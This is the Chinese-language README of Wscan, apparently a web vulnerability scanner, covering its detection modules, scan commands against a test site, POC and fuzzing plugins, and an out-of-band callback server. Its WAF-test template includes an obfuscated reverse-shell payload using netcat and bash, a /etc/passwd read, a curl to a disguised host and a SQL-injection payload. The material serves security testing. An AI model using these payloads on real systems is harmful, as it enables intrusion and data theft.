未经事先双方同意,使用 Wscan 扫描目标是非法的。 Wscan 仅用于安全测试目的。 在使用之前, 请务必阅读并同意 License 文件中的条款,否则请勿安装使用本工具。
Wscan是一款专注于WEB安全的扫描器,它向Nmap致敬,而Nmap已经开源25年了。我们也计划在未来25年内持续更新Wscan,并将其持续开源。我们欢迎所有对web安全感兴趣的人一起加入我们的开发团队。
我们的目标是开发一款使用机器学习进行渗透测试的工具。与其他工具不同的是,我们的工具可以自动学习攻击和防御的模式,并根据具体的目标进行个性化的攻击。这样一来,我们的攻击效率和准确性将大大提高,同时也能降低误判的概率。
我们的工具采用了机器学习技术,实现了全自动化的Web渗透测试。这意味着无需手动添加和更新规则和签名,它能够自动学习和适应新的攻击模式和漏洞。
机器学习技术还能够快速处理大量的数据和流量,从而大幅提高测试效率和准确性。此外,它能够识别和发现一些人工难以察觉的漏洞和弱点,从而改善测试质量和可靠性。
我们相信,使用机器学习技术进行渗透测试,将是未来网络安全的一个重要方向。我们希望我们的工具能够帮助更多的人保障网络安全,为网络安全事业做出贡献。
检测模块 | Wscan | Xray | 说明 |
---|---|---|---|
xss |
√ | √ | 利用语义分析的方式检测XSS漏洞 |
sqldet |
√ | √ | 支持报错注入、布尔注入和时间盲注等 |
cmd-injection |
√ | √ | 支持 shell 命令注入、PHP 代码执行、模板注入等 |
dirscan |
√ | √ | 检测备份文件、临时文件、debug 页面、配置文件等10余类敏感路径和文件 |
path-traversal |
√ | √ | 支持常见平台和编码 |
xxe |
√ | √ | 支持有回显和反连平台检测 |
upload |
√ | √ | 支持常见的后端语言 |
brute-force |
√ | √ | 社区版支持检测 HTTP 基础认证和简易表单弱口令,内置常见用户名和密码字典 |
jsonp |
√ | √ | 检测包含敏感信息可以被跨域读取的 jsonp 接口 |
ssrf |
√ | √ | ssrf 检测模块,支持常见的绕过技术和反连平台检测 |
baseline |
√ | √ | 检测低 SSL 版本、缺失的或错误添加的 http 头等 |
redirect |
√ | √ | 支持 HTML meta 跳转、30x 跳转等 |
crlf-injection |
√ | √ | 检测 HTTP 头注入,支持 query、body 等位置的参数 |
xstream |
√ | √ | 检测XStream系列漏洞 |
struts |
√ | √ | 检测目标网站是否存在Struts2系列漏洞,包括s2-016、s2-032、s2-045、s2-059、s2-061等常见漏洞 |
thinkphp |
√ | √ | 检测ThinkPHP开发的网站的相关漏洞 |
shiro |
√ | √ | 检测Shiro反序列化漏洞 |
fastjson |
√ | √ | 检测fastjson系列漏洞 |
Nuclei YAML POC |
√ | × | Nuclei 标准的POC检测插件 |
Xray YAML POC |
√ | √ | Xray 标准的POC检测插件 |
Goby JSON POC |
√ | × | Gody 标准的POC检测插件 |
自定义FUZZ插件 |
√ | × | 对body、query中的参数进行模糊测试 |
Waf绕过/Waf测试 |
√ | × | 自定义各种特殊的Payload,测试Waf是否能拦截 |
WEB组件识别 |
√ | × | 识别网站应用的组件及相关技术 |
⬇️下载地址 🏠最佳实践 👻WEB指纹插件编写指南 🎯WEB通用漏扫插件编写指南
配置漏扫插件、动态爬虫、静态爬虫代理
http:
proxy: "socks5://153.34.245.41:7777"
主动扫描,支持静态爬虫、动态爬虫、URL文件、单个URL等
Wscan首次运行时,将会生成一个名为config.yaml的文件。将plugins下面的所有插件的enabled设置为True。 如果要进行POC扫描,请先参考POC扫描配置,下载插件包并配置插件包路径。
./wscan --log-level=debug ws --basic-crawler http://testphp.vulnweb.com/ --json-output=wscan_scan_result.json --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --url http://testphp.vulnweb.com/listproducts.php?cat=1 --json-output=wscan_scan_result.json
./wscan --log-level=debug ws --url-file=/wscan/url_file.txt --html-output=wscan_scan_result.html
在命令行中使用plug参数启用要扫描的插件
./wscan --log-level=debug ws --plug=sqldet --basic-crawler http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
运行genca命令之后,将在当前文件夹生成 ca.crt 和 ca.key 两个文件。
./wscan genca
安装CA的方法与XRAY一致,可以参考XRAY文档
在命令行中使用plug参数启用要扫描的插件
./wscan --log-level=debug ws --plug=sqldet,xss --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json
Wscan首次运行时,将会生成一个名为config.yaml的文件。将plugins下面的所有插件的enabled设置为True。 如果要进行POC扫描,请先参考POC扫描配置,下载插件包并配置插件包路径。
./wscan --log-level=debug ws --listen=127.0.0.1:1000 --json-output=wscan_scan_result.json
Wscan不内置任何POC插件,但Wscan的prometheus插件引擎已支持Nuclei、XRAY、Goby 标准POC插件, 与其它扫描器不同的是Wscan可以自定义POC检测的深度,从而发现更多的Web安全问题。
我们把下载的 X-ray 和 Nuclei 插件包放入同一个目录,并在配置文件中指定插件包的路径。
XRAY、Goby POC插件包下载地址
https://github.com/chaitin/xray/tree/master/pocs
Nuclei POC插件包下载地址
https://github.com/projectdiscovery/nuclei-templates/tree/main/http
Nuclei包含许多类型插件,只建议保存nuclei-templates-main/http中的插件,将其拷贝到wscan-poc目录中即可
Ⅰ. 同时扫描Nuclei、XRAY、Goby POC插件, 这种模式下只启用POC检测插件,不启用其它类型的插件
./wscan --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
./wscan --log-level=debug ws --poc=/your_wscan_poc/wscan-poc/pocs/* --url-file=/url_file.txt --html-output=wscan_scan_result.html
Ⅰ.运行方式与主被动扫描一致,但需要配置插件包路径, Wscan首次运行时,将会生成一个名为config.yaml的文件。您需要修改该文件中的以下内容,以指定include_poc的路径。
prometheus:
enabled: true
depth: 1 # 是探测深度, 默认为 1, 即只在 URL 深度为 0, 和深度为 1 时运行该插件
auto_load_poc: false
include_poc:
- /your_wscan_poc/wscan-poc/pocs/*
exclude_poc: []
不同于POC测试,自定义FUZZ插件,会对指定位置的参数进行FUZZ, 并支持自定义CEL表达式来验证是否存在漏洞
样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/custom/tmpl/
name: "custom-sqli"
set:
r1: randomInt(800000000, 1000000000)
payload:
- extractvalue(1,concat(char(126),md5({{r1}})))
placeholder:
- query
- body
- header
- cookie
expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
您需要修改config.yaml文件中的以下内容,以指定custom的路径。
custom:
enabled: true
depth: 0
auto_load_tmpl: false
include_tmpl:
- /wscan/core/plugins/custom/tmpl/*.yml
exclude_tmpl: []
通过命令行启用--plug=waftest,即可对目标网站进行自定义Payload测试。
./wscan --log-level=debug ws --plug=custom --url http://testphp.vulnweb.com/listproducts.php?artist=1 --html-output=wscan_scan_result.html
不同于POC测试,自定义WEB通用漏洞扫描插件,会对指定位置的参数进行FUZZ,
样例参考 https://github.com/chushuai/wscan/tree/main/core/plugins/waftest/tmpl/owasp
payload:
- $(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'|rev)
- /etc/passwd
- "`curl -L http://\u24BC\u24C4\u24C4\u24BC\u24C1\u24BA.\u24B8\u24C4\u24C2`"
encoder:
- URL
placeholder:
- URLParam
- HTMLForm
- HTMLMultipartForm
- JSONRequest
type: "RCE"
您需要修改config.yaml文件中的以下内容,以指定include_tmpl的路径。
waftest:
enabled: true
depth: 0
auto_load_tmpl: false
include_tmpl:
- /wscan/core/plugins/custom_tmpl/tmpl/owasp/*.yml
exclude_tmpl: [ ]
block_status_codes: # 被WAF阻止时HTTP状态码列表,默认值为403
- 403
pass_status_codes: # 未被WAF阻止时HTTP状态码列表, 默认值为200或404
- 200
- 404
block_regex: "" # 被WAF阻止网页的正则表达式
pass_regex: "" # 未被WAF阻止网页的正则表达式
non_blocked_as_passed: false
通过命令行启用--plug=waftest,即可对目标网站进行自定义Payload测试。
./wscan --log-level=debug ws --plug=custom_tmpl --browser http://testphp.vulnweb.com/ --html-output=wscan_scan_result.html
在进行漏洞检测的时候,我们会发现有很多的漏洞在执行了一些命令后,从表面上看没有任何回应的,比如命令执行漏洞,log4j rce,fastjson,ssrf等等, 但由于前端并没有对应的展示,导致我们并不能知道文件是否成功读取,那么当面对这类的漏洞,我们就需要一个反连平台, 通过让目标执行ping、curl等命令,对反连平台发起请求,反连平台在接受到请求后, 就能告诉我们,命令触发了,也就代表了漏洞存在了。
注意: Wscan支持http、dns、rmi、ldap四种返连类型,其中http、rmi、ldap复用同一个端口。
reverse:
db_file_path: "reverse.db"
token: "xxxx"
http:
enabled: true
listen_ip: 0.0.0.0
listen_port: ""
ip_header: ""
dns:
enabled: false
listen_ip: 0.0.0.0
domain: ""
is_domain_name_server: false
resolve:
- type: A
record: localhost
value: 127.0.0.1
ttl: 60
client:
remote_server: false
http_base_url: ""
dns_server_ip: ""
reverse:
client:
remote_server: true
http_base_url: ""
dns_server_ip: ""
rmi_server_addr: ""
Wscan支持JSON、HTML等多种格式的扫描报告,其中包含详尽的漏洞验证逻辑。
- 2023.11.05 发布v1.0.0 二进制版,支持简单的Web通用漏洞检测
- 2023.11.12 发布v1.0.1 二进制版,静态爬虫
- 2023.11.12 发布v1.0.2 二进制版,支持被动扫描
- 2023.11.19 发布v1.0.3 二进制版,支持JSONP插件
- 2023.11.26 发布v1.0.4 二进制版,修复XSS、SQL注入漏报的问题,支持对单个URL进行漏洞检测
- 2023.11.30 发布v1.0.5 二进制版,支持浏览器爬虫、支持URL、表单智能过滤
- 2023.12.02 发布v1.0.6 二进制版,支持输出JSON、HTML格式的扫描结果
- 2023.12.03 发布v1.0.7 二进制版,支持Yaml POC扫描插件
- 2023.12.04 发布v1.0.8 二进制版,支持通过命令行指定要启用的plugins
- 2023.12.09 发布v1.0.9 二进制版,支持自定义WEB通用漏洞扫描模板(Waf绕过/Waf测试)
- 2023.12.12 发布v1.0.10 二进制版,目录扫描内置400条常见规则、支持自定义扫描路径爆破。支持ASP、PHP通用命令执行检测
- 2023.12.24 发布v1.0.11 二进制版,支持独立部署反连模块,同时Yaml POC支持反连功能
- 2023.12.30 发布v1.0.12 二进制版,支持Goby JSON POC插件,多层URL目录POC扫描
- 2024.01.07 发布v1.0.13 二进制版,支持XXE、SSRF、Fastjson、 Struts2系列漏洞批量检测
- 2024.01.15 发布v1.0.14 二进制版,支持thinkphp系列漏洞批量检测
- 2024.01.18 发布v1.0.15 二进制版,支持PHP、JSP、ASP、ASPX任意文件上传检测、被动扫描支持智能请求过滤
- 2024.01.21 发布v1.0.16 二进制版,支持Nuclei Yaml POC插件、Shiro 框架识别与默认key破解插件
- 2024.03.08 发布v1.0.17 二进制版,优化了页面相似度分析算法,解决了Boolean SQL注入误报问题
- 2024.03.10 发布v1.0.18 二进制版,支持自定义FUZZ插件,对body、query中的参数进行模糊测试
- 2024.03.25 发布v1.0.19 二进制版,新增xstream系列漏洞检测插件
- 2024.03.27 发布v1.0.20 二进制版,主被动扫描支持hostname、path作为过滤条件
- 2024.04.06 发布v1.0.21 二进制版,主被动扫描支持WEB组件识别,内置3700+WEB组件识别插件
Wscan的目标是创建一个开源且非盈利的项目。然而,由于Wscan的工作量庞大,代码仍在快速迭代中。 过早地进行开源可能导致各种各样的魔改版本涌现,这对工具的传播和项目未来的发展并不利。 因此,计划以Stars作为考量指标,分阶段分模块进行开源,以确保项目的稳健性和社区的有序参与。
- YAML POC扫描模块 (Stars > 400 开源)
- 反连模块 (Stars > 400 开源)
- 对内置的Payload不满意,自定义WAF绕过WEB通用漏洞检测模板 (特色功能)(Stars > 400 开源)
- SQL注入模块 (Stars > 500 开源)
- 动态爬虫 (Stars > 600 开源)
- 目录扫描模块 (Stars > 700 开源)
- 基线扫描 (Stars > 800 开源)
- 基于消息订阅的插件调度模块 (Stars > 900 开源)
- HTTP参数形变模块, 传统扫描模块全部开源, 可自行修改编译构建扫描器 (Stars > 1k 开源)
- 机器学习降低误报模块 (Stars > 3k 开源)
- 机器学习自动生成Paylaod模块 (Stars > 4k 开源)